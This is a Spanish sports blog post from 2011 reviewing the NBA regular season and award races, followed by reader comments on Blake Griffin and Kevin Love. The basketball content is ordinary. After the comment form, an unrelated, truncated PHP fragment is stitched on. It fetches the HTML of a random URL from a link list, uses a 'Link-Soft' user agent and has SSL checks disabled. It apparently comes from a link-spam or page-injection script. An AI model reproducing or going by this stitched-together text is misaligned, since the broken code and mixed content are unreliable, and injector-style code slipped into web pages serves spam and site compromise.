Informe #3

03 de March de 2011 por TheDeerHunter

La frenética actividad reciente en TJNBA nos ha tenido apartados de esta sección. Lamentablemente no hemos podido mantener una frecuencia constante con ella este curso y os pedimos disculpas. A estas alturas es difícil que la fijemos, pero será suficiente con un par  de repasos generales en lo que queda de competición. Nunca es tarde si la dicha es buena y siempre es buen momento para disponer de una visión más global que el simple día a día que nos aportan las crónicas.

¿Por qué todos los jugones sonríen igual?

Con ellos abrimos el último informe a finales de Noviembre y con ellos abrimos éste. Los Spurs han sido los primeros en alcanzar las 50 victorias y casi con total probabilidad firmarán +65, con la consiguiente ventaja campo durante toda la postemporada. Diría que este panorama no lo esperaba ni el más optimista allí, mucho menos con la frescura ofensiva que están desplegando los de Popovic. Tras el deadline se advierte un cierto descenso de nivel en el Oeste. El primer puesto en la regular no garantiza nada pero este puede ser un extraordinario año para ellos.

A la chita callando los Mavs vienen firmando un impresionante 17-1. Digirieron una terrible racha en enero y las lesiones de Nowitzki y Butler. Da la sensación que Carlisle ha logrado dar con la tecla de su potente plantilla. Si Butler logra volver a tiempo, la semifinal de conferencia será un objetivo menor para ellos.

En el Este los gallos están disfrutando de una regular excesivamente plácida. Que lo hagan, porque se les viene encima unos playoffs extremadamente duros. La mayor revelación viene siendo Chicago, que no sólo pueden mirar directamente a la cara a los grandes mastodontes de la conferencia, sino que además parecen cada día más fuertes. Hemos hablado muy poco de ello, pero Tom Thibodeau es toda una realidad para aquellos que lo dudaban.

Tampoco es que le hayan echado excesivamente de menos en Boston. La defensa de los Celtics sigue siendo de lejos la nº1. A los verdes se les ve, si cabe, mejor que nunca durante el proyecto “Big Three”. Están exactamente donde ellos quieren para darle un bocado al título.

Justo en el último informe los Heat habían tocado fondo y el proyecto daba muestras de tambalearse. Extraordinaria reacción de los de Spoelstra fundamentadas en una dura defensa y en la incuestionable calidad de sus estrellas. No en vano son el equipo con mayor diferencial anotados/recibidos de toda la liga. Son un hueso duro.

Por último habría que destacar la meritoria temporada de los Sixers. En noviembre eran miembros ilustres del Carabasas Club y ahora están cómodamente consolidados en la 7ª plaza del Este. Son carne de 1ª ronda pero hay muy buena base para trabajar de cara al futuro. El modelo coral que ha instalado Doug Collins se ha demostrado atractivo y eficaz.

Ganarás el pan con el sudor de tu frente

Ninguno de los dos finalistas de hace dos años están disfrutando de una plácida regular. Lakers y Magic han tocado varias cotas de bochorno durante estos últimos meses. Cada uno ha optado por un camino distinto hacia la solución de sus problemas. Orlando ha revolucionado la plantilla y los amarillos han intentado reencontrarse con ellos mismos. Es pronto para evaluar los resultados, pero por méritos propios van a sufrir mucho para cumplir con sus objetivos.

Muchos defienden que los grandes vencedores en el tradeline han sido los Thunder, y eso que el precio que han pagado para apuntalar su juego interior ha sido alto. Oklahoma se mueve claramente en una dirección, la del anillo por fin. Una auténtica gesta para ellos.

Los Hawks han terminado perdiendo su estatus de top4 del Este. Se veía venir. Parece que se han reforzado bien con la adquisición de Hinrich para una posición tan crítica como la de base. No sabemos si será suficiente para repetir 2ª ronda con una plantilla tan sumamente corta.

En noviembre dábamos por hecho que los Grizzlies habían empezado su tradicional “dejarse llevar” fuera de las plazas de postemporada. En absoluto. Incluso con un caso Mayo digno de expediente-X los “osetes” están dando cara de la buena. Tal y como pinta el panorama les damos muchas opciones para apuntalar su logro. No siempre se hacen mal las cosas en Memphis. Tampoco lo van a tener fácil, con unos Suns y unos Rockets que se han reinventado a sí mismos para presentar batalla. Como todos los años las 8 plazas del Oeste valen su precio en oro.

Habiéndolo pasado tan mal como los Blazers en esa guerra, ante tantas dificultades de las que han logrado sobreponerse, encontrarse con más de un 55% de victorias tiene un mérito enorme. No entra en la cabeza de nadie que no jueguen las eliminatorias. Medallas justas para McMillan y sus gladiadores, aunque la hora de la verdad es harina de otro costal. Por cierto, Rudy está firmando un gran año.

Los Knicks han llegado a la tierra prometida (o al menos un buen sucedáneo de ella) con el fichaje de Carmelo Anthony. La ilusión se ha desbordado en la ‘gran manzana’ y por fin tienen razones para el optimismo. Eso sí, no será fácil que, al menos este curso, todo no se quede en eso,  ilusión.

Finalmente los Nuggets superan con nota su crisis existencial con Carmelo Anthony. Siempre es complicado encontrar sustituto a una figura de su categoría y a buen seguro que no olvidarán así como así a Billups, pero las penas con pan son menos penas y el pan para ellos es buen juego y un nivel de la plantilla nada despreciable. Las reconstrucciones, así todas.

Se dejaban llevar.

El asunto Sloan vs Williams todavía escuece en Utah. ¡Qué prontos más malos! La consecuencia es que los Jazz verán los playoffs por la TV por 4ª ocasión en 28 años y por debajo del 50% de victorias por segunda vez en todo ese tiempo. Lo peor es que el panorama es el más negro desde que tenemos uso de razón.

Tras un extraordinario comienzo los Hornets han entrado en barrena. De momento mantienen su plaza de postemporada pero todo parece indicar que no les va a durar demasiado. Los cantos de sirena desde otros lugares ha afectado gravemente su pilar maestro. Si Chris Paul se hunde los Hornets se hunden. Ni siquiera para posicionarse bien para el draft y para la reconstrucción, les va a servir esta campaña.

Nos hubiera gustado un final más feliz para el curso de Warriors y Clippers este año. No lo tendrán y habrá que conformarse otra vez más sólo con buenos momentos puntuales que nos han ofrecido. En la otra conferencia es posible que no entrasen en la lotería este año. Los Pacers dormitan en esa 8ª plaza, donde no parece haber rival en el Este que la busque decididamente.

Finalmente los Nets son la otra cara de la moneda en el problema de Utah. En una campaña abominable les cae un rayo de esperanza con Deron Williams frente a las promesas de su máximo mandatario.

El carabasas club.

Los equipos de lotería del Este deambulan entre lo triste y lo patético. Si el corte de playoffs del Este de asequible roza lo ridículo, para ellos se antoja inalcanzable. Los Bobcats han dado carpetazo al confuso proyecto Larry Brown y a una fugaz reconstrucción. Nada mejor que regalar buenos jugadores para empezar de 0. Lo de reconstruir parece en algunos casos más un vicio que un proceso. En Charlotte disfrutan más en ese estado que en cualquier otro.

La autodestrucción es una forma de vivir como cualquier otra. Así lo tienen claro en Detroit, en Toronto, en Cleveland o en Washington. En Milwaukee por lo menos pueden achacar el fracaso a que la mala suerte se ha cebado con ellos.

En el Oeste las excusas de unos resultados tan lamentables podrían ser diversas, pero al menos los Kings y Wolves miran al futuro con pequeñas dosis de optimismo.

En todos estos casos pertenecer al club de seguidor suyo es castigo divino y prueba manifiesta de masoquismo.

PREMIOS TJNBA:

¿Por qué eres tan bueno?

Con el sorprendente balance de su equipo y con sus más de 24 puntos por partido, 8 asistencias, 4 rebotes y un robo, Derrick Rose es el candidato nº1 para lograr el MVP esta campaña. Últimamente se ha hablado también de Howard e incluso LeBron mantiene sus opciones.

Al salir de clase.

A la bestia Griffin no le tose nadie ni en los highlights ni en la carrera por el RoY. Sus casi 23 puntos, 13 rebotes y 4 asistencias le plantan cara a los números de muchas estrellas consagradas. Impacto directo de puro mito.

Fields ha bajado un poco sus prestaciones, pero a cambio han surgido Wall y Cousins como buenos “medalla de plata” para un premio ya adjudicado.

La vida puede ser maravillosa.

Con Kevin Love pulverizando récords de gente como Garnett o Moses Malone es imposible no tenerle en cuenta para cualquier premio tipo “sorpresa del año” o MIP. Casi con total seguridad será jugador más mejorado, aunque la sombra de la duda surge en cuanto alguien menciona el lamentable 24% de victorias de su equipo y la cuchara de madera del Oeste por la que están esforzándose. Eso sí… el que menos culpa tiene de ese feo detalle sin ninguna duda es él.

Cortocircuitos S.L.

Cuando uno ya se había hecho al “odioso” perfil del entrenador de los Jazz, cuando habíamos empezado a entender y valorar esos bloqueos mortíferos, a ese espíritu espartano alejado de cualquier mínima concesión… va Sloan y nos deja. Precisamente por un cortocircuito mental y un quítame allá ese par de gritos.

Algunos jamás olvidaremos lo perras que resultaban las eliminatorias de playoffs contra aquellos Jazz subcampeones.

Imágenes | AP Photos & Getty Images

Comenta

6 comentarios a esta entrada

  1. Nacho dice:
    #1

    ¿por qué siempre los análisis en torno a K. Love (que comparto) aportan el dato de que su equipo es perdedor, y con B. Griffin no entramos en lo mismo (las victorias más de los Clippers no llegan a diez)?
    Al leñador de Minnesota no le he visto jugar, pero la bestia como decís, a mí no me parece que sea para tanto. A día de hoy espectacular por momentos, pero su impacto en el juego coral no me parece tan tremendo como se suele apuntar. No se por qué me parece otro tío tipo Bosh. Muy buen jugador sin duda, pero no mucho más. Al menos el de la costa oeste tiene tiempo de crecer y aprender. El del Este sin llevar mal año no es el de los numerazos de Toronto. Sí, ya se que me diréis que comparte cancha con otros dos que manejan más la bola, pero no olvidemos que lleva más tiros por partido que un tal Pau. Ah! y menos rebotes con compañeros de juego interior bastante más pobres que cualquier otro equipo (igual es que no se quiere pelear con LB por engordar sus números.

      Citar

  2. TheDeerHunter dice:
    #2

    Me corresponde a mí contestarte.
    El problema de los Wolves no es que sean perdedores. Es que son muy perdedores. La diferencia de victorias entre ellos es un 50% del total de victorias del equipo de Minneapolis. Con ese comentario yo no pretendo quitarle mérito a Love, pero es indudable que resulta un inmenso contraste sus números casi paranormales con los resultados del equipo. La duda surge automática y no me la he sacado de la manga. No pasa nada por afrontar la cuestión sin favoritismos. No sería ni el primero ni el último gran especialista de maquillar sus boxscores en el caso de que sea ese su caso.

    Las comparaciones de Griffin con Love o Bosh me cuesta mucho verlas. Son todos jugadores de muy diferente perfil por mucho que jueguen en la misma posición. Griffin es noticia porque es novedad, porque hace un baloncesto distinto a lo que estamos acostumbrados… pero no lo puede ser por sacar de la noche a la mañana a una franquicia como los Clippers de pobres. Ni Jordan, ni LeBron han hecho algo parecido…
    Como rookie no creo que sea razonable exigirle según qué cosas. Defectos… no creo que haya habido nadie que haya negado que los tiene, pero todo lo que está haciendo con esa impresionante regularidad es incuestionablemente asombroso. Y el mundo baloncestístico creo que así lo entiende.

      Citar

  3. Denise dice:
    #3

    Yo a los Clippers los respeto y no lo considero un equipo perdedor como Wolves.
    Los Clippers le han ganado este año (si mi memoria no me falla) a Spurs, Heat y Lakers, y tienen un futuro muy prometedor, con Griffin, los demás jovenes y lo que puedan sacar este año en el draft. Yo creo que van a ser un fijo en los playoffs en los próximos años.
    La reconstrucción de Wolves no es mala, pero mucho peor de momento que la de Clippers. El año que viene se supone que contarán con Ricky y un top 5 del draft, pero aún así no lo veo de momento para playoffs, y creo que tampoco habrá algún agente libre interesante con ganas de irse a Minnesota (que no es L.A. como ciudad).
    Por cierto, para hacenumeros, Beasley, jugador nacido para meter 20 puntos por noche en un equipo mediocre y que hace que el equipo necesite dos balones para jugar.

      Citar

  4. Sancho88 dice:
    #4

    Había escuchado comparar a Griffin con Barkley, Duncan, James, Malone, Boozer… con todo dios. pero… con Kevin Love y Chris Bosh… ya me parece insólito. En números es cierto que Love está en 20-15 y Griffin en 23-12. Son cifras similares, pero Love no tiene ni el 50% de aptitudes físicas que Griffin. Su juego es otra cosa totalmente distinta, más de colocación táctica y currele y su tiro exterior es superior al de Griffin. Pero la explosividad del jugador de los Clippers matando es de jugador diferente. ¿Bosh? sí, otro jugador nada comparable con Griffin. Su esfuerzo declina año a año y Griffin lógicamente cada vez se esfuerza más. Ahí Love y Griffin van de la mano, en la responsabilidad que asumen como líderes de sus equipos. Pero, quizás yo veo más a Love como el Kaman de los Clippers, un muy buen jugador interior que es plastilina de gran calidad si tiene un superclase al lado. Y Griffin, en cambio, es el superclase. Jeje, es curioso, son totalmente diferentes pero harían una pareja cojonuda.
    Y sobre las dos franquicias… también son jodidas de comparar. Minnesotta aún vive el shock de la salida de Garnett, una enfermedad de la que aún convalece y que le hacen ser un equipo que se deja llevar desde entonces. Ya veremos si Ricky es suficiente para que den el paso adelante. En ese aspecto, un equipo comparable a ellos, y no son los Clippers, son los Cavs con lo de Lebron. Clippers, sin embargo, no han sufrido esa herida mortal (perder una gran estrella que te ha llevado a finales de conferencia en PO’s) sino que siempre han rozado altas espectativas sin llegar a vivir la gloria que sí vivieron los Wolves. Ahora reverdecen y siempre lo hemos dicho en esta página, de no ser por el desastrosisimo comienzo y las lesiones de Kaman, Davis (a principios de temporada) y Gordon, habrían jugado postemporada seguro. Además, con la llegada ahora de Mo Williams ya tienen al director original preferido de James para dirigir a Griffin (yo siempre defenderé la comparación de Griffin y James) el año que viene, en el que ya se les va a pedir mucho más.
    Asi que, lo importante es disfrutar del talento natural de Griffin y del trabajo de Love. No son comparables y en eso está la gracia, de hecho. Que haya muchos perfiles distintos para ver el baloncesto desde todos los puntos de vista

      Citar

  5. Nacho dice:
    #5

    No comparo jugadores, sino trayectorias, números y ¿empuje mediático? (no se si esto me termina de gustar pero ahora no encuentro otra palabra) Y en este sentido creo que nos pasamos con Griffin. Que puede crecer y ser la hostia, vale. Aunque yo no comparto las predicciones de Sancho y no lo veo un superclase (claro que de estos hay dos), y sí un gran hombre de complemento ( y esto no es peyorativo, Gasol lo es y es un jugadorazo) Y sí creo que maquilla sus números (bueno no creo, lo hace, porque sino no entiendo para que juega últimos cuartos de un partido que su equipo peirde de 30 si no es para eso- que tambuién puede ser que lo busque el coach para darle confianza, ojo- peor no deja de ser maquillaje)
    Y en eso sí lo comparaba con Bosh.
    A Love, repito que no lo he visto jugar, y lo que comento es después de leeros, que es otra forma de ver los partidos.
    Un abrazo y gracias por el blog, por vuestros comentarios, y por estar aquí.
    P.D. Vujacic en cinco años otro anillo con Deron. Que ganas ser otra vez con orgullo de los Nets. Los que crecimos en el basquet con Petrovic es lo que tenemos. Y si somos del Atleti moral no nos falta.

      Citar

  6. Txusma dice:
    #6

    Se me había pasado completamente el tema Love. Yo creo que es bastante complicado maquillar tu BoxScore a base de rebotes. Love no es un tío que asuma un número excesivo de tiros y sus rebotes vienen primordialmente a base de colocación y un talento innato para saber donde va a ir el balón. Posiblemente, ultimamente sus compañeros les estén echando un cable para q bata el récord de dobles-dobles consecutivos pero no creo que le reste un ápice de mérito a lo que hace.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>